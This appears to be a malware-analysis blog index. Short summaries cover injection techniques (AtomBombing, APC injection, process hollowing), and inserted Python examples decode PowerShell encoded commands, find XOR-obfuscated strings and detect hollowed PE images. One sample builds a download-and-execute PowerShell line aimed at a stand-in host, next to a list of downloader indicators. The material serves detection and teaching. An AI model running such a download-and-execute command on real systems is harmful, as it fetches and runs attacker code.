Malware Analysis Articles (22)

Malware Classification

What are the different types of malware? A Guide to Malware Classification.

The Working Environment of Popular Debuggers and Disassemblers

In a previous article we discussed the basic concepts of debuggers and disassemblers. We will now take a look at the working environment of popular debugging and disassembling applications.

Introduction to Debuggers and Disassemblers

Reverse Engineering (RE) has been the leading technique for understanding the structure and operation of malicious programs and what they’re programmed to do for a very long time.

Tools to get you Started in Malware Analysis

In this blog post, we will discuss a few additional extremely useful analysis tools. Please note that this is not an exhaustive list of the best available tools, but rather a starting point.

Identifying Malware Persistence

This article will discuss the most prevalent persistence techniques employed by malware.

What is fileless malware?

Fileless malware is malware that does not rely on dropping its own executable to disk to infect a system. Instead, it abuses programs and resources that are already present on the system to run and, where needed, persist. Fileless malware typically uses scripting hosts such as PowerShell or VBScript to execute its code, and the payload runs directly in memory, so security solutions that only scan files on disk have little to inspect.
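As an added example (not part of the original article), the decoding step an analyst performs most often on a fileless PowerShell launcher: powershell.exe accepts its script as base64 over UTF-16LE via -EncodedCommand, so the script never has to exist as a .ps1 on disk. The payload and the two command lines below are constructed for the example, and the indicator list and the set of "evasion" launch flags are my own choices, not a standard list.

```python
import base64

# Constructed sample data (not captured telemetry): a downloader one-liner of the
# kind a fileless dropper hands to powershell.exe, and two process command lines,
# one carrying it in -EncodedCommand form and one benign.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_CMDLINES = [
    f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {ENCODED}",
    "powershell.exe -NoProfile -Command Get-Process",
]

# Substrings whose presence in a decoded script suggests a staged, in-memory loader
# (assumed list for the example).
SCRIPT_INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "invoke-webrequest", "frombase64string", "reflection.assembly",
    "memorystream", "-join",
)

# Launch switches (or their values) that hide the console or disable policy checks.
EVASION_SWITCHES = {"nop", "noprofile", "noni", "noninteractive", "hidden", "bypass"}


def is_encoded_command_flag(token):
    """powershell.exe accepts any prefix of -EncodedCommand from '-e' upwards, plus '-ec'."""
    flag = token.lstrip("-/").lower()
    return flag == "ec" or (flag.startswith("e") and "encodedcommand".startswith(flag))


def decode_encoded_command(cmdline):
    """Return details of an -EncodedCommand payload found in a command line, or None.

    The payload is base64 over UTF-16LE (the encoding PowerShell itself uses);
    decoding it as UTF-8 would yield text with a NUL between every character.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not is_encoded_command_flag(tok):
            continue
        blob = tokens[i + 1]
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            script = raw.decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            # Still worth flagging: a bogus blob after -e is itself unusual.
            return {"script": None, "indicators": [], "launch_flags": [], "error": "undecodable"}
        lowered = script.lower()
        launch = [t.lower() for t in tokens[:i] if t.lower().lstrip("-/") in EVASION_SWITCHES]
        return {
            "script": script,
            "indicators": [s for s in SCRIPT_INDICATORS if s in lowered],
            "launch_flags": launch,
        }
    return None


def triage(cmdlines):
    """Map every command line that carries an encoded payload to its decoded details."""
    hits = {}
    for cmd in cmdlines:
        details = decode_encoded_command(cmd)
        if details is not None:
            hits[cmd] = details
    return hits


if __name__ == "__main__":
    for cmd, details in triage(SAMPLE_CMDLINES).items():
        print(f"launch flags: {details['launch_flags']}")
        print(f"indicators:   {details['indicators']}")
        print(f"script:       {details['script']}")
```

The same decoding applies to telemetry from Sysmon event 1 or an EDR process-creation feed; the decoded script is what you then read for a second stage, since the base64 blob itself tells you nothing. Note that a `-Command` argument wrapping `FromBase64String` is the other common shape and is not handled by this decoder.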

Malware Injection Techniques: API hooking techniques

API hooking, which builds on process injection, is used by adversaries to intercept Windows API calls and modify their input or output. Use cases include stealing credentials, preventing security tools from loading, hijacking network connections, logging keystrokes, and hiding processes and files.

Malware Injection Techniques: AtomBombing, EWMI, NtTestAlert

AtomBombing is a code injection technique that abuses the Windows global atom table: the injector stores its payload as atoms, queues an asynchronous procedure call (APC) that makes a thread of the target process copy the atom data into its own address space with GlobalGetAtomName, and then uses further APCs to run a return-oriented chain that makes the copied code executable and jumps to it. The payload runs in an existing thread the next time that thread becomes alertable, so no new process or remote thread is created, which is what makes the technique hard to spot; the injected code runs with whatever privileges the target process already has.

Malware Injection Techniques: APC injection

APC injection is a code injection technique that queues a user-mode asynchronous procedure call (APC) on a thread of the target process, so that code already written into that process runs the next time the thread enters an alertable wait. It is hard to detect because it creates no new process or file; it only modifies an existing process. APC injection is used to load other payloads, such as keyloggers and remote access tools, and to disable security features such as antivirus software.

Malware Injection Techniques: Thread Execution Hijacking and SetWindowsHookEx

We continue to review the various methods of code injection!

Malware Injection Techniques: Process Hollowing

Process hollowing starts a legitimate executable in a suspended state, unmaps (hollows out) its original image from the new process's address space, writes a malicious image in its place, points the main thread at the new entry point, and resumes execution. Malware uses it so that its code masquerades as a legitimate process: the process name, path and parent all look benign, while the code actually running belongs to the attacker and executes with the permissions of the hollowed process.

Malware Injection Techniques: Introduction

Malware uses process injection as an evasion method: it executes custom code within the address space of another process to achieve stealth and, in some situations, persistence.

Windows Internals: Processes

Before we begin anything connected to malware execution, let’s delve into the Windows System Internals and grasp the basic components of a process and the system on which we will conduct our investigations and analyses. Understanding how to trace and monitor suspicious processes in your restricted environment is crucial.

Introduction to Behavior Analysis Techniques

In this series of blog posts, we will examine several aspects of dynamic malware analysis: how malware behaves and why it must be analyzed dynamically, the various dynamic analysis methodologies, and the advantages and drawbacks of each method, technique, and tool.

Fuzzy Hashing, Import Hashing and Section Hashing

In the last post we looked at a variety of methods for tracking and recognizing malware samples, including hashes, fuzzy hashes, and even writing YARA rules. However, threat actors constantly change their code to defeat signatures, which makes it difficult for us to recognize their tools and tactics.

Introduction to YARA Rules - Part 2

Let’s continue our acquaintance with YARA rules!

Introduction to YARA Rules - Part 1

There has been a lot of research over the years into improving detection, and researchers have come up with many novel detection methods and methodologies. Each has its own advantages and disadvantages, so we cannot say we would always choose one over another: some are better suited to one task but not to another. For this reason, many organizations implement a hybrid approach.

Identifying Obfuscated Malware

Obfuscation is one of the strategies threat actors use to hide their malware, avoid detection, and hinder analysis. The goal is to transform the code so that it becomes harder to understand while its behaviour stays the same. Changes to program structure, to the way the code is written, and the use of encoding or encryption (including packing) are all examples of such modifications.
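As an added example (my code, not the article's), two checks analysts use to spot encoding and encryption in a sample: Shannon entropy of a byte range, where values approaching 8 bits per byte point to packed or encrypted data, and recovery of a single-byte XOR key by searching for a known plaintext such as `http://`, which is how obfuscated C2 URLs are often found. The encoded URL and the padding bytes around it are constructed for the example.

```python
import math
from collections import Counter

# Constructed sample: a C2 URL XOR-encoded with a single byte, embedded in a blob of
# filler bytes, the way a string table in a sample might look.
XOR_KEY = 0x5A
PLAIN_URL = b"http://example.invalid/gate.php?id=7"
ENCODED_URL = bytes(b ^ XOR_KEY for b in PLAIN_URL)
SAMPLE_BLOB = b"\x80" * 32 + ENCODED_URL + b"\x80" * 16


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data, threshold=7.0):
    """Heuristic: compiled code sits around 5-6.5 bits/byte; packed or encrypted data above ~7."""
    return shannon_entropy(data) >= threshold


def xor_single_byte(data, key):
    return bytes(b ^ key for b in data)


def recover_xor_key(ciphertext, crib):
    """Try all 256 single-byte keys and return (key, plaintext) for those where the crib appears."""
    hits = []
    for key in range(256):
        plain = xor_single_byte(ciphertext, key)
        if crib in plain:
            hits.append((key, plain))
    return hits


def find_xor_strings(buffer, crib, min_len=8):
    """Scan a blob for printable runs that decode under some single-byte XOR key and contain the crib.

    Returns (offset, key, decoded_string) triples. Key 0 is skipped: plaintext strings
    are found with an ordinary strings pass.
    """
    results = []
    for key in range(1, 256):
        decoded = xor_single_byte(buffer, key)
        start = decoded.find(crib)
        while start != -1:
            # Extend the hit to the full printable run around the crib.
            begin, end = start, start
            while begin > 0 and 0x20 <= decoded[begin - 1] < 0x7F:
                begin -= 1
            while end < len(decoded) and 0x20 <= decoded[end] < 0x7F:
                end += 1
            run = decoded[begin:end]
            if len(run) >= min_len:
                results.append((begin, key, run.decode("ascii")))
            start = decoded.find(crib, end)
    return results


if __name__ == "__main__":
    print(f"entropy of encoded region: {shannon_entropy(ENCODED_URL):.2f} bits/byte")
    for offset, key, text in find_xor_strings(SAMPLE_BLOB, b"http://"):
        print(f"offset {offset:#x} key {key:#04x}: {text}")
```

Single-byte XOR barely changes entropy (it is a bijection on byte values), so the entropy check is for spotting packed or encrypted regions, while the crib search is for cheap string obfuscation; a multi-byte or rolling key needs a longer known plaintext or a tool such as XORSearch or FLOSS, and anything with entropy near 8.0 usually has to be unpacked dynamically before strings become visible.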

Reverse Engineering Portable Executables (PE) - Part 2

The PE file format is the executable file format used by Microsoft Windows. It is a container for everything the loader needs to run a program: headers describing the layout, the code and data sections, the import and export tables, and resources. On Windows it is used for executables (.exe), dynamic-link libraries (.dll) and drivers (.sys); the same format is also used outside Windows, for example for UEFI firmware images, but Windows binaries are by far the most common case an analyst meets.
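An added example, not code from the article, that ties the PE structure described here to the section hashing of the "Fuzzy Hashing, Import Hashing and Section Hashing" post and to the process hollowing post above: a minimal parser that walks the DOS header, NT headers and section table, hashes each section, and flags an in-memory image whose entry point or section content does not match the file on disk. The two-section PE32+ images are constructed inside the code; a real check would read the on-disk file and the process's mapped image at its load address.

```python
import hashlib
import struct

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def build_sample_pe(text, entry_rva, mapped=False):
    """Construct a minimal two-section PE32+ image for the example (not a real binary).

    mapped=False places sections at PointerToRawData, as in a file on disk;
    mapped=True places them at VirtualAddress, as they appear in process memory.
    """
    sections = [(b".text", 0x1000, 0x200, text, 0x60000020),           # CODE | EXECUTE | READ
                (b".data", 0x2000, 0x400, b"config=1\0", 0xC0000040)]  # INITIALIZED_DATA | READ | WRITE
    hdr = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)               # e_lfanew: NT headers at 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0xF0, 0x22)
    opt = struct.pack("<HBBIIIII", 0x20B, 14, 0, len(text), 0, 0, entry_rva, 0x1000)
    opt += struct.pack("<Q", 0x140000000)                               # ImageBase
    hdr += opt.ljust(0xF0, b"\0")                                       # remaining optional-header fields zeroed
    for name, va, raw, body, flags in sections:
        hdr += struct.pack(SECTION_HDR, name, len(body), va, 0x200, raw, 0, 0, 0, 0, flags)
    image = bytearray(0x3000 if mapped else 0x600)
    image[:len(hdr)] = hdr
    for _, va, raw, body, _ in sections:
        off = va if mapped else raw
        image[off:off + len(body)] = body
    return bytes(image)


def parse_pe(data):
    """Walk DOS header -> NT headers -> section table and return the fields an analyst checks first."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                                 # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    pe32plus = magic == 0x20B
    entry = struct.unpack_from("<I", data, opt + 16)[0]                 # AddressOfEntryPoint
    image_base = struct.unpack_from("<Q" if pe32plus else "<I", data, opt + (24 if pe32plus else 28))[0]
    sections = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"), "vsize": f[1],
                         "va": f[2], "rawsize": f[3], "rawptr": f[4], "flags": f[9]})
    return {"machine": machine, "pe32plus": pe32plus, "image_base": image_base,
            "entry_rva": entry, "sections": sections}


def section_hashes(data, mapped=False):
    """MD5 per section over min(VirtualSize, SizeOfRawData) bytes so disk and memory compare like for like."""
    hashes = {}
    for s in parse_pe(data)["sections"]:
        off = s["va"] if mapped else s["rawptr"]
        size = min(s["vsize"], s["rawsize"])
        hashes[s["name"]] = hashlib.md5(data[off:off + size]).hexdigest()
    return hashes


def compare_images(disk, memory):
    """Hollowing check: the image in memory should match the file the process claims to be running."""
    d, m = parse_pe(disk), parse_pe(memory)
    findings = []
    if d["entry_rva"] != m["entry_rva"]:
        findings.append(f"entry point RVA differs: disk {d['entry_rva']:#x}, memory {m['entry_rva']:#x}")
    dn, mn = [s["name"] for s in d["sections"]], [s["name"] for s in m["sections"]]
    if dn != mn:
        findings.append(f"section table differs: disk {dn}, memory {mn}")
    dh, mh = section_hashes(disk), section_hashes(memory, mapped=True)
    for name in sorted(dh.keys() & mh.keys()):
        if dh[name] != mh[name]:
            findings.append(f"section {name} content differs")
    return findings


# Constructed sample images: the on-disk file, a faithful in-memory copy, and a
# hollowed one whose .text and entry point have been replaced.
CLEAN_TEXT = b"\x48\x83\xec\x28\x90\x90\x48\x83\xc4\x28\xc3"   # sub rsp,28h ; nop ; nop ; add rsp,28h ; ret
HOLLOW_TEXT = b"\xcc" * 32                                        # stand-in for injected code
DISK_IMAGE = build_sample_pe(CLEAN_TEXT, 0x1000)
MEMORY_CLEAN = build_sample_pe(CLEAN_TEXT, 0x1000, mapped=True)
MEMORY_HOLLOWED = build_sample_pe(HOLLOW_TEXT, 0x1010, mapped=True)

if __name__ == "__main__":
    info = parse_pe(DISK_IMAGE)
    print(f"machine={info['machine']:#x} entry={info['entry_rva']:#x} "
          f"sections={[s['name'] for s in info['sections']]}")
    for name, digest in section_hashes(DISK_IMAGE).items():
        print(f"  {name:8} md5={digest}")
    print("clean:", compare_images(DISK_IMAGE, MEMORY_CLEAN) or "no differences")
    print("hollowed:", compare_images(DISK_IMAGE, MEMORY_HOLLOWED))
```

On a real process some differences are expected: the import address table is patched at load time and sections with relocations change if the image did not load at its preferred base, so compare the code section and the entry point rather than every byte, and treat a differing PE header, a missing on-disk file, or an entry point outside .text as the strong signals. Section hashes also serve the clustering use in the hashing post: two samples whose .text hashes match are almost certainly the same build, even when the whole-file hash differs because of a changed resource or overlay.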

Reverse Engineering Portable Executables (PE) - Part 1

When approaching malware analysis, one of the most important subjects to learn is the Portable Executable (PE) file format.

Introduction to Static Code Analysis for Malware Reverse Engineering

Static code analysis is the process of examining a program without executing it. For malware, source code is rarely available, so in practice it means examining the binary itself: headers, strings, imports, and disassembled code. This lets an analyst identify malicious functionality without running the sample and risking infection of the analysis system. Static analysis can be performed manually or with automated tools.

Becoming a Malware Analyst

You have been using the free trial version of a tool called My Photo Editor for your image editing activities. However, the trial period has ended and a licence has to be purchased from the website to continue using the software.